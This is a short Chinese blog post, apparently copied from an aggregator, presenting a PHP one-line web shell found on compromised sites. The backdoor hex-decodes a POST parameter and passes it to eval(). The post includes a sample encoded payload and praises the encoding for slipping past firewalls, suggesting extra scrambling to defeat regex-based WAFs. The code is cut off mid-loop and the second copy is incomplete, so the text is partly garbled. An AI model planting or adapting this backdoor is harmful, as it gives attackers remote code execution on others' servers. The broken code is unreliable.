一个有趣的一句话木马,加密了通讯方式,使用了一个小特性。

朋友发现一个后门文件,让我看看如何使用。

使用了hex编码进行加密,这样完全可以过各种防护。如果防护加了规则,那就加点算法扰乱,感觉通过正则WAF时代要过去了。。。没什么卵用,太难防御了。

gutou=706870696E666F28293B   phpinfo()

error_reporting(0);set_time_limit(0);

$GuTou=@$_POST["gutou"];

if($GuTou){

   $GuTou=str_replace(array("\n","\t","\r"),"",$GuTou);

   $cc="";for($i=0;$i

   $cc.=urldecode("%".substr($GuTou,$i,2));

   @eval($cc);exit;

}

?>

另外一个网站发现这样的代码:

$GuTou=@$_POST["gutou"];

if($GuTou){

   $GuTou=str_replace(array("\n","\t","\r"),"",$GuTou);

   $cc="";for($i=0;$i

   $cc.=urldecode("%".substr($GuTou,$i,2));

   @eval($cc);exit;

你可能感兴趣的:(一个有趣的一句话木马,加密了通讯方式,使用了一个小特性。)